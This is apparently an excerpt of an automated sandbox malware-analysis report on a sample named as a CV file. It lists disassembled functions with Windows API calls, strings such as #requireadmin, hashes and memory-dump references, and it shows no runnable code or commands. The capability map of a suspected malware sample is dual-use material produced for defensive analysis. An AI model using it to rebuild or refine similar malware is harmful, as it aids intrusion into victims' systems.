FreeLibrary.KERNEL32(00000000), ref: 0035243E

Strings

@, xrefs: 00352334

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: fda8fceba8e65ff0627ac73ad9473392ac1a0e0459adc305f0db71ccead076ec
Instruction ID: 6e642759b1e41e468c82ec4ad44a63568ed8700ff59960aac32910eb39647950
Opcode Fuzzy Hash: fda8fceba8e65ff0627ac73ad9473392ac1a0e0459adc305f0db71ccead076ec
Instruction Fuzzy Hash: C3718DB4A006199FCF16EFA4C8919AEB7F5FF49310F118469E855AB3A1CB34AD44CF90

Function 00333DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00333DE7
GetKeyboardState.USER32(?), ref: 00333DFC
SetKeyboardState.USER32(?), ref: 00333E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00333E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00333EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00333EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00333F13

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8dba1e9be1a4e14b67b0f726e46296f01891638f4a6cf6a5cb575e8a3bef9e84
Instruction ID: 53cce9ad5d64d665d7ef79065d523d8b2cc5aaafc95d897403f12dc5c4ca0fed
Opcode Fuzzy Hash: 8dba1e9be1a4e14b67b0f726e46296f01891638f4a6cf6a5cb575e8a3bef9e84
Instruction Fuzzy Hash: F751C1A1A047D53DFB3743248C86BB67EA95F06304F09C589F0D94A8C2D3A8EEC4D761

Function 00333BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00333C02
GetKeyboardState.USER32(?), ref: 00333C17
SetKeyboardState.USER32(?), ref: 00333C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00333CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00333CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00333D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00333D26

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d0bcab3f62a41411bf8da8bf6bfb2a27ed643bb890e73fff553f0ee3ce8b9f66
Instruction ID: 0a64b4829473c7ec9ff48ee24128622affa53961b58eab453f490292bdc43aa9
Opcode Fuzzy Hash: d0bcab3f62a41411bf8da8bf6bfb2a27ed643bb890e73fff553f0ee3ce8b9f66
Instruction Fuzzy Hash: 8451E6A05087D53DFB3387748C96BB6BFA96F06300F08C589E0D55A8C2D694EED4D760

Function 00337DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00337DBE
_wcsncpy.LIBCMT ref: 00337DF3
_wcsncpy.LIBCMT ref: 00337E25
_wcsncpy.LIBCMT ref: 00337E58
_wcsncpy.LIBCMT ref: 00337E9A
_wcsncpy.LIBCMT ref: 00337ED4
_wcsncpy.LIBCMT ref: 00337F03

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 1fbe68deadccc8047ddbfe6f484e5510c81abb5bac00c3cf7e70808d8bab7a35
Instruction ID: 57abbffa80d8aa63827b437fc7e3b107744433ae1bf8b3fb1461bb71986d7346
Opcode Fuzzy Hash: 1fbe68deadccc8047ddbfe6f484e5510c81abb5bac00c3cf7e70808d8bab7a35
Instruction Fuzzy Hash: DA41726AC10214B6CB26EBF4CC869CFB3ACAF08310F518966E518F7121F674E694C7E5

Function 00353D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00353DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00353DCB
FreeLibrary.KERNEL32(00000000), ref: 00353E80

Part of subcall function 00353D72: RegCloseKey.ADVAPI32(?), ref: 00353DE8
Part of subcall function 00353D72: FreeLibrary.KERNEL32(?), ref: 00353E3A
Part of subcall function 00353D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00353E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00353E25

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 97fa76150c4348ef96b750b0b6779e97ddf4a35e6bb7f26fd8aeb3106fcdf05b
Instruction ID: 3b0385744f156f410dd623d0cea376975e9be0c6f0c205c4768c1612436af489
Opcode Fuzzy Hash: 97fa76150c4348ef96b750b0b6779e97ddf4a35e6bb7f26fd8aeb3106fcdf05b
Instruction Fuzzy Hash: 1D31FEB2901109BFDB169F94DC86EFFB7BCEF08341F100169E916E2160D6749F899BA0

Function 00358FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00358FE7
GetWindowLongW.USER32(0116E3F0,000000F0), ref: 0035901A
GetWindowLongW.USER32(0116E3F0,000000F0), ref: 0035904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00359081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003590AB
GetWindowLongW.USER32(00000000,000000F0), ref: 003590BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003590D6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 6ace212753205e39586d642d7c2ac22c7d508d2b91df8af47bd479d6951986f9
Instruction ID: 08018c57c4fc51e61c772ef8cf528f30bd94e72d533bad0063455859f11bd30f
Opcode Fuzzy Hash: 6ace212753205e39586d642d7c2ac22c7d508d2b91df8af47bd479d6951986f9
Instruction Fuzzy Hash: 9F312434600215EFDB228F58DC84F6477B9FB4A769F1502A6FA198F2F1CB71A844DB81

Function 003308AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003308F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00330918
SysAllocString.OLEAUT32(00000000), ref: 0033091B
SysAllocString.OLEAUT32(?), ref: 00330939
SysFreeString.OLEAUT32(?), ref: 00330942
StringFromGUID2.OLE32(?,?,00000028), ref: 00330967
SysAllocString.OLEAUT32(?), ref: 00330975

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7fde5a35e987c80ee94b90b67320ff7d451bf610b687576a54ef4ed83cdab0c9
Instruction ID: 9483a2d2bef4619382f68c4dbf0a38e604f32c46faa5af903143157aed799fb7
Opcode Fuzzy Hash: 7fde5a35e987c80ee94b90b67320ff7d451bf610b687576a54ef4ed83cdab0c9
Instruction Fuzzy Hash: A321B572601208AFEB219F68CC88EBB73BCEF09760F008125F919DB161D770EC418B60

Function 00332472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00332485
__wcsnicmp.LIBCMT ref: 003324A6
__wcsnicmp.LIBCMT ref: 003324C0

Strings

#notrayicon, xrefs: 0033247D
#OnAutoItStartRegister, xrefs: 003324BA
#requireadmin, xrefs: 003324A0

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 14df49913f1441f8ee99ab5f4773976b849afdc1b0eafc9cbfac0fb6477e40fc
Instruction ID: 8117df8ebdc083cb9fe0b0c9bc0f5c51c0bfe3f6b87fba175f3307412901f2a0
Opcode Fuzzy Hash: 14df49913f1441f8ee99ab5f4773976b849afdc1b0eafc9cbfac0fb6477e40fc
Instruction Fuzzy Hash: 4921493220521167D737BB36DC52EFBB39CEF66310F608029F5469B582E6619A82C395

Function 00330986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003309CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003309F1
SysAllocString.OLEAUT32(00000000), ref: 003309F4
SysAllocString.OLEAUT32 ref: 00330A15
SysFreeString.OLEAUT32 ref: 00330A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00330A38
SysAllocString.OLEAUT32(?), ref: 00330A46

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ac69fabf25f49b28685eab8ab0d0461a1dadcbe8b03a45e9a0707b095e948e46
Instruction ID: d39bdd62b4f8128763265a6bd48b8715428122d9b6fd9ccdeab81f32e946684b
Opcode Fuzzy Hash: ac69fabf25f49b28685eab8ab0d0461a1dadcbe8b03a45e9a0707b095e948e46
Instruction Fuzzy Hash: 1C218675200204AFDB25DFA9DCD9DAA77ECEF08360F418125F909CB2A1DA74EC818764

Function 0035A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0030D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0030D1BA
Part of subcall function 0030D17C: GetStockObject.GDI32(00000011), ref: 0030D1CE
Part of subcall function 0030D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0030D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0035A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0035A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0035A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0035A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0035A360

Strings

Msctls_Progress32, xrefs: 0035A2FE

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 6238373278f9d108fb561b870fbb59e53b43336ef9d0f5897b40971511817df9
Instruction ID: aa2be0a0190c6f6e3f14b34ed05c333db867694632f7059f95480a0989e2aa58
Opcode Fuzzy Hash: 6238373278f9d108fb561b870fbb59e53b43336ef9d0f5897b40971511817df9
Instruction Fuzzy Hash: 4F11B2B1150219BEEF165FA4CC85EEB7F6DFF09798F014214FA08A60A0C7729C25DBA4

Function 0030CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0030CCF6
GetWindowRect.USER32(?,?), ref: 0030CD37
ScreenToClient.USER32(?,?), ref: 0030CD5F
GetClientRect.USER32(?,?), ref: 0030CE8C
GetWindowRect.USER32(?,?), ref: 0030CEA5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 71a0b606295465afbd1781f70cdc9e90b53b87f18e74b32916facc2cf18af917
Instruction ID: 2c51683fc1fb1c0a15952a72adc05627fc95258fba0abba14fbcbe17f8745684
Opcode Fuzzy Hash: 71a0b606295465afbd1781f70cdc9e90b53b87f18e74b32916facc2cf18af917
Instruction Fuzzy Hash: 82B1AD79910249DBDF11CFA8C4907EEBBB5FF08300F15A229EC59EB694DB30A940DB64

Function 00351BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00351C18
Process32FirstW.KERNEL32(00000000,?), ref: 00351C26
__wsplitpath.LIBCMT ref: 00351C54

Part of subcall function 00311DFC: __wsplitpath_helper.LIBCMT ref: 00311E3C

_wcscat.LIBCMT ref: 00351C69
Process32NextW.KERNEL32(00000000,?), ref: 00351CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00351CF1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: ff1fc8aaf3387b458e026849495980422397f1edb61df4bbeeb73f37a1bba3ac
Instruction ID: e346c443aec699744e525eab355aabeb54e5091ea7207b9ccffa15ca4aa0a586
Opcode Fuzzy Hash: ff1fc8aaf3387b458e026849495980422397f1edb61df4bbeeb73f37a1bba3ac
Instruction Fuzzy Hash: 075170711043049FD721EF24C885EABB7ECEF88754F00492EF9899B291DB70E944CB92

Function 00352FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00353C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00352BB5,?,?), ref: 00353C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003530AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003530EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00353112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0035313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0035317E
RegCloseKey.ADVAPI32(00000000), ref: 0035318B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: fd57d331e332eb5adf317a1da4f28ed08a5664e02fc8320cc73ed9d33a89e725
Instruction ID: 4667a996879d385fadc764777ead3632f1feb8d4a98cb8734f4d4904d27cd8cd
Opcode Fuzzy Hash: fd57d331e332eb5adf317a1da4f28ed08a5664e02fc8320cc73ed9d33a89e725
Instruction Fuzzy Hash: 7F515831118304AFC711EF64C881E6AB7F9FF88384F04492DFA459B2A1DB71EA19CB52

Function 003584DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00358540
GetMenuItemCount.USER32(00000000), ref: 00358577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0035859F
GetMenuItemID.USER32(?,?), ref: 0035860E
GetSubMenu.USER32(?,?), ref: 0035861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0035866D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 074c3b773ad5f539a0d7d9b15df86c7c11811bbc1f2895fc08661b4b0304b1e0
Instruction ID: 34fe4fb4fc946ddd4d9627a5cc26b9196dff736ef34bf7400cfad0df370ceeda
Opcode Fuzzy Hash: 074c3b773ad5f539a0d7d9b15df86c7c11811bbc1f2895fc08661b4b0304b1e0
Instruction Fuzzy Hash: F2516E71A00219AFCB12EF64C845EAEB7F8EF49310F114469EE15BB361DB70AE458F91

Function 00334AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00334B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00334B5B
IsMenu.USER32(00000000), ref: 00334B7B
CreatePopupMenu.USER32 ref: 00334BAF
GetMenuItemCount.USER32(000000FF), ref: 00334C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00334C3E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 1235ae8de46eb6ade03576659a99b44a61792eb79cea0d186c5cd68cfc481c79
Instruction ID: a2aa98956c0b702b04150aec61d6ff985637cb498b4bbde1fb454c5f0a30cd40
Opcode Fuzzy Hash: 1235ae8de46eb6ade03576659a99b44a61792eb79cea0d186c5cd68cfc481c79
Instruction Fuzzy Hash: 9B51D170601309EFDF26CF68D8C8BADBBF8AF45318F144159E4559B2A1E371A984CB51

Function 00348DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0038DC00), ref: 00348E7C
WSAGetLastError.WSOCK32(00000000), ref: 00348E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00348EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00348EC5
_strlen.LIBCMT ref: 00348EF7
WSAGetLastError.WSOCK32(00000000), ref: 00348F6A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: d72d6098eec554566111d5cafd7e98f91ceeaa49493c09cf03ccb9e2ff2aba14
Instruction ID: 180f419d0c370fefc0e3177ab8509feb8c24e25ca21dead63ec8c7442a941ec0
Opcode Fuzzy Hash: d72d6098eec554566111d5cafd7e98f91ceeaa49493c09cf03ccb9e2ff2aba14
Instruction Fuzzy Hash: E041B171500108AFCB15EF64DD86EAEB7BDAF08354F104569F51AAB2D1DF30AE44CB60

Function 0030ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

BeginPaint.USER32(?,?,?), ref: 0030AC2A
GetWindowRect.USER32(?,?), ref: 0030AC8E
ScreenToClient.USER32(?,?), ref: 0030ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0030ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0030AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0036E673

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

